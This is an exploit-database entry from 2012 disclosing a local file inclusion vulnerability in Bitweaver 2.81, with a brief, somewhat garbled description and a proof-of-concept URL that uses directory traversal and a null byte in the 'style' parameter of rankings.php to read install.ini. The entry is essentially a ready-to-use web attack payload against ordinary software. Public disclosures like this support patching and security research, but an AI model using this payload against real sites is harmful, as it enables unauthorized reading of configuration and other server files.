Bitweaver v2.81 Local File Inclusion Vulnerability



EKU-ID: 1549 CVE: OSVDB-ID:
Author: I2sec-PJH Published: 2012-02-28 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: Bitweaver v2.81 LFI exploit
# Date: 27.02.2012
# Author: I2sec-PJH
# Software Link: http://sourceforge.net/projects/bitweaver/files/bitweaver2.x/bitweaver2.8.1.zip/download
# Version: v2.81
# Tested on: windows xp
------------------------------------------------------
-Description
LFI vulnerability in version 2.81 is available
ini files can be read when entering and various other extension produces spit tpl files.
-PoC
http://localhost/wiki/rankings.php?style=../../../../../../../../install.ini%00